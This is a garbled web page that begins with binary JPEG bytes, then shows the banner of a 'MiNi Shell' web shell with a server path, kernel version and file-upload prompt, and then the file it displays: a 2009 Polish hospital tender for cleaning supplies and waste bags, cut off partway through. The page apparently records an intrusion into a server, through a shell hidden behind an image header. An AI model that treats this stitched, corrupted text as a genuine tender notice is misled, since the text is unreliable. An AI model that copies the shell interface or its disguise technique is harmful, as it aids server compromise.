JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/130075-N-2009.html

<p class="kh_header"><b>Płock: ZAKUP I DOSTAWA ŚRODKÓW CZYSTOŚCI, CHEMII GOSPODARCZEJ ORAZ NACZYŃ JEDNORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 130075 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o. , ul. Kościuszki 28, 09-402 Płock, woj. mazowieckie, tel. 024 3645100, 3645124, faks 024 3645102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plockizoz.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ŚRODKÓW CZYSTOŚCI, CHEMII GOSPODARCZEJ ORAZ NACZYŃ JEDNORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa środków czystości, chemii gospodarczej oraz naczyń jednorazowych według poniższego zakresu: 
Pakiet Nr 1 - Chemia gospodarcza, Pakiet Nr 2 - Środki do mycia podłóg, Pakiet Nr 3 - Mopy i stelaże, Pakiet Nr 4 - Sprzęt gospodarczy, Pakiet Nr 5 - Środki czyszczące stal nierdzewną, Pakiet Nr 6 - Worki foliowe, Pakiet Nr 7 - Ręczniki i papiery toaletowe, Pakiet Nr 8 - Talerze i kubki jednorazowe.
Termin realizacji zamówienia sukcesywnie przez okres 12 miesięcy od dnia podpisania umowy z zastrzeżeniem skrócenia czasu trwania umowy odpowiednio do wyczerpania przedmiotu zamówienia. 
Dostawy będą realizowane na podstawie cząstkowych zamówień składanych przez Zamawiającego. Termin realizacji zamówień cząstkowych wynosi maksymalnie do 4 dni roboczych od zgłoszenia telefonicznego lub faxem. W przypadku zamówienia pilnego do 2 dni roboczych od zgłoszenia telefonicznego lub faxem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.80.00.00-0, 39.83.12.00-8, 39.83.12.10-1, 39.80.00.00-0, 39.22.43.00-1, 18.93.00.00-7, 33.76.10.00-2, 33.76.30.00-6, 39.22.21.10-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenia zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 pkt. 1 - 10 oraz art. 24 ust. 2 pkt. 1 - 4 ustawy Prawo zamówień publicznych.
2.	Posiadają uprawnienia do wykonywania określonej działalności w zakresie objętym przedmiotem zamówienia.
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:
a.	warunek określony w pkt. 1) spełnia każdy z Wykonawców,
b.	warunek określony w pkt. 2) spełnia każdy z Wykonawców,
c.	warunek określony w pkt. 3) spełniają łącznie wszyscy Wykonawcy,
d.	warunek określony w pkt. 4) spełniają łącznie wszyscy Wykonawcy.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia nie spełnia, na podstawie dokumentów wymienionych poniżej.
Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty występujące wspólnie. Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty. Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty.
Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.
W niniejszym postępowaniu Zamawiający nie będzie żądał zabezpieczenia należytego wykonania umowy.
Nie przewiduje się zawarcia umowy ramowej.
Nie ustanawia się dynamicznego systemu zakupów.
Nie przewiduje się wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku, o którym mowa, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Postępowanie o udzielenie zamówienia publicznego jest jawne. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu postępowania, z tym że oferty udostępnia się od chwili ich otwarcia. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępnione (zastrzeżenie należy dołączyć do oferty). Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy. 
Udostępnienie treści protokołu oraz otwartych ofert odbywać się będzie wg poniższych zasad:
a.	Zamawiający udostępni wskazane dokumenty po złożeniu pisemnego wniosku.
b.	Zamawiający wyznaczy termin, miejsce oraz zakres udostępnianych dokumentów i informacji.
c.	Zamawiający wyznaczy członka Komisji Przetargowej w obecności, którego udostępnione zostaną dokumenty.
d.	Zamawiający umożliwi kopiowanie udostępnionych dokumentów i informacji odpłatnie. Za wykonanie kserokopii dokumentów oraz za ich przesłanie Wykonawcy listownie Zamawiający będzie pobierał opłatę w wysokości określonej w Zarządzeniu Prezesa Zarządu Spółki Płocki Zakład Opieki Zdrowotnej Sp. z o.o.
e.	Wskazane we wniosku dokumenty postępowania będą udostępnione wyłącznie w siedzibie Zamawiającego oraz w czasie godzin jego urzędowania, tj. w godzinach 7:30-15:05.
f.	Bez zgody Zamawiającego zabrania się wykonywania zdjęć złożonych ofert.
g.	W sprawach nieuregulowanych zastosowanie mają przepisy ustawy oraz rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku w sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz.U. Nr 188, poz. 1154)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.	Do oferty należy załączyć następujące oświadczenia i dokumenty w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Załącznik  Nr 2 do SIWZ - na potwierdzenie warunków Rozdział III pkt. 1 - 4.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawione nie wcześniej niż 6 m - cy przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
3.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
II.	Do oferty należy załączyć również:
1.	Zaświadczenie stwierdzające, że zaproponowany asortyment odpowiada określonym normom jakościowym, np.: PZH, certyfikaty, karty charakterystyki produktu (dotyczy środków czyszczących i pielęgnujących). 
2.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Pełnomocnictwo musi zostać dołączone do oferty w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
3.	Wypełniony Formularz cenowy - Pakiet Nr 1 - Chemia gospodarcza, Pakiet Nr 2 - środki do mycia podłóg, Pakiet Nr 3 - Mopy i stelaże, Pakiet Nr 4 - Sprzęt gospodarczy, Pakiet Nr 5 - Środki czyszczące stal nierdzewną, Pakiet Nr 6 - Worki foliowe, Pakiet Nr 7 - Ręczniki i papiery toaletowe, Pakiet Nr 8 - Talerze i kubki jednorazowe - Załącznik Nr 3/1 - 3/8 do SIWZ.
4.	Oświadczenie, że Wykonawca:
a.	nie zleci wykonania przedmiotu zamówienia podwykonawcom a całość prac wykona w ramach działań swojego przedsiębiorstwa 
lub
b.	zamierza powierzyć wykonanie części zamówienia podwykonawcom. Zamawiający żąda wskazania części zamówienia, której wykonanie zamierza powierzyć podwykonawcom (formularz oferty - Załącznik Nr 1 do SIWZ).
7.   Próbki, wraz z wykazem oferowanych produktów 
W przypadku złożenia oferty wspólnej pełnomocnictwo musi zawierać jednoznaczne upoważnienie do zaciągania zobowiązań, podpisywania umowy i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, podpisane przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. Termin, na jaki została zawarta umowa Wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
Pełnomocnictwo musi zostać dołączone do oferty w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
Dokumenty, o których mowa w pkt, I. 1 - 3 winien załączyć każdy z przedsiębiorców składających ofertę wspólną.
Dokumenty wymienione w pkt. I. 2 - 3, II 1 należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej stosuje się do przepisów paragrafu 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.).
Zamawiający wezwie Wykonawców, którzy nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub  którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowany przedmiot zamówienia wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
Zamawiający może także w wyznaczonym przez siebie terminie, wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Jakość - 60</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/SZPZOZ-Plock.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> strony internetowej www.przetargi.ipzp.pl/SZPZOZ-Plock oraz w siedzibie zamawiającego tj.: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., 09 - 402 Płock, ul. Kościuszki 28, pok. Nr 202.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 09:30, miejsce: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., 09 - 402 Płock, ul. Kościuszki 28, pok. Nr 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - Chemia gospodarcza.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Druciak metalowy 	op. 3 szt	50 op.
2	Druciak plastikowy 	op. 3 szt	50 op.
3	Emulsja samopołyskowa do pielegnacji i konserwacji wykładzin PCV i podłóg drewnianych  (zawierająca woski chroniące)	op. 0,5l	500 op.
4	Kostka do WC z zawieszką	szt.	1600 szt.
5	Mleczko do czyszczenia na bazie podchlorynu sodu . Jakości porównywalnej z mleczkiem CIF	op. 0,5l	200 op.
6	Zagęszczony płyn czyszczący do WC, dopuszczony do stosowania w zakładach opieki zdrowotnej	op. 1l	2500 op.
7	Płyn do mycia szyb  ze spryskiwaczem z amoniakiem nie pozostawiający smóg. Opakowanie z możliwością uzupełnienia.	op. 0,5l	750 op.
8	Płyn do mycia naczyń ,ph naturalne, jakości porównywalnej z płynem Ludwik	op. 0,5l	4000 op.
9	Płyn do usuwania kamienia i rdzy na bazie kwasu fosforowego 750ml	op. 0,75l	2000 op.
10	Środek do dezynfekcji i czyszczenia  typu Domestos ,op.1250 ml	op. 1250 ml	20 op.
11	Rękawice gospodarcze gumowe, rozmiar S, L, XL	par.	7500 par
12	Ścierka do podłogi z wiskozy, pomarańczowa 50x60 cm	szt.	900 szt.
13	Pasta do czyszczenia  powierzchni i  urządzeń sanitarnych, zlewów, skutecznie usuwający naloty, kamień, przebarwienia nie rysująca powierzchni typu Tola	op. 250g	500 op.
14	Ściereczki uniwersalne wiskozowe roz.51x37cm (+ 10 cm) ,kolory żółty, czerwony, niebieski, zielony, nie ulegające zniszczeniu w czasie jednego cyklu pracy.	op. 10szt	6000 op.
15	Środek do mycia naczyń w zmywarkach przemysłowych zawierający środek myjący i nabłyszczający oraz odkamieniacz	op. 10l	170 op.
16	Zapałki 	op. 10 pudełeczek	45 op.
17	Zmywak szorstki-gąbka	szt.	350 szt.
18	Rękawice foliowe	op. 100 szt.	350 op.
19	Mydło w płynie , antybakteryjne,glicerynowe o ph neutralnym	op. 0,5l	1100 op.
20	Sól do odkamieniania  w zmywarkach typu Calgonit	op. 1,5 kg	15 op.
21	Mleczko do czyszczenia i pielęgnacji mebli	op.  250ml	20 op.
Kryteria oceny jakości oferowanych produktów: 
Dotyczy wszystkich pozycji: środki łatwe w użyciu, nie drażniące rąk, posiadające atesty. Poz. 12 i 14: Ścierki odporne na rozerwania nie odbarwiające się..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.80.00.00-0, 39.83.12.00-8, 39.83.12.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - Środki do mycia podłóg.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Środek do gruntownego mycia mocno zabrudzonych podłóg typu Tarkett , o silnych właściwościach czyszczących, skutecznie usuwający stary brud,tłuszcze,pasty oraz warstwy polimerowe, op.10l	op. 10l	80 op.
2	Środek na bazie polimerów do nabłyszczania podłóg typu Tarkett, nie przyjmujący kurzu i brudu, nie powodujący poślizgu, op.10l	op. 10l	60 op.
3	Środek do bieżącej pielęgnacji podłóg typu Tarkett, skutecznie usuwający brud, pozostawiający połysk,utrwalający warstwę polimerową , op.10l	op. 10l	80 op.

Kryteria oceny jakości oferowanych produktów: 
Dotyczy wszystkich pozycji: środki profesjonalne, dobrze czyszczące i konserwujące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - Mopy i stelaże.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Stelaż do mopa płaskiego supełkowego, wykonany a wytrzymałego tworzywa sztucznego, rozmiar 40x11cm	szt.	30 szt.
2	Stelaż do mopa płaskiego supełkowego, wykonany a wytrzymałego tworzywa sztucznego, rozmiar 50x13cm	szt.	5 szt.
3	Trzonek do stelaża aluminiowy	szt.	10 szt.
4	Mop supełkowy płaski , biały, wykonany z bawełny i poliestru, odporny na kwasy i ługi, mocowany za pomocą zakładek, przeznaczony do wielokrotnego użytku, o długości 40 cm.	szt.	250 szt.
5	Mop supełkowy płaski , biały, wykonany z bawełny i poliestru, odporny na kwasy i ługi, mocowany za pomocą zakładek, przeznaczony do wielokrotnego użytku, o długości 50 cm.	szt.	40 szt.
Kryteria oceny jakości oferowanych produktów: 
Dotyczy wszystkich pozycji: odporne na złamania, łatwe w użyciu, bezproblemowa  wymiana..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4 - Sprzęt gospodarczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Szczotka ryżowa do szorowania podłogi drewniana z mocowaniem  na trzonek	szt.	20 szt.
2	Trzonek do szczotki ryżowej, drewniany	szt.	20 szt.
3	Mop supełkowy (końcówka) , biały, wykonany z bawełny i poliestru, odporny na kwasy i ługi, przeznaczony do wielokrotnego użytku	szt.	250 szt.
4	Trzonek aluminiowy do mopa supełkowego	szt.	15 szt.
Kryteria oceny jakości oferowanych produktów: 
Dotyczy wszystkich pozycji: łatwe w użyciu, bezproblemowa wymiana..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5 - Środki czyszczące stal nierdzewną.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Środek do mycia i konserwacji powierzchni ze stali szlachetnej, nabłyszczający powierzchnie metalu i zabezpieczający ją przed zabrudzeniem, nie powodujący zacieków,  typu Chromol	op. 0,5 l	10 op.
Kryteria oceny jakości oferowanych produktów: środek nie powodujący zacieków, nie rysujący, nadający połysk..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 - Worki foliowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Worek foliowy LDPE na odpady, czarny 30l  50x60cm, grubość 0,03 mikrona	szt.	150000 szt.
2	Worek foliowy  LDPE na odpady ,czerwony 30l  50x60cm, grubość 0,03 mikrona	szt.	70000 szt.
3	Worek foliowy  LDPE na odpady ,zielone 30l  50x60cm, grubość 0,03 mikrona	szt.	1000 szt.
4	Worek foliowy LDPE na odpady, żółty  30l  50x60cm, grubość 0,03 mikrona	szt.	5000 szt.
5	Worek foliowy LDPE na odpady, czerwony 120l  70x110cm, grubość 0,05 mikrona	szt.	20000 szt.
6	Worek foliowy LDPE na odpady, niebieskie 120l  70x110cm, grubość 0,05 mikrona	szt.	5000 szt.
7	Worek foliowy LDPE na odpady, czarny 120l  70x110cm, grubość 0,05 mikrona	szt.	50000 szt.
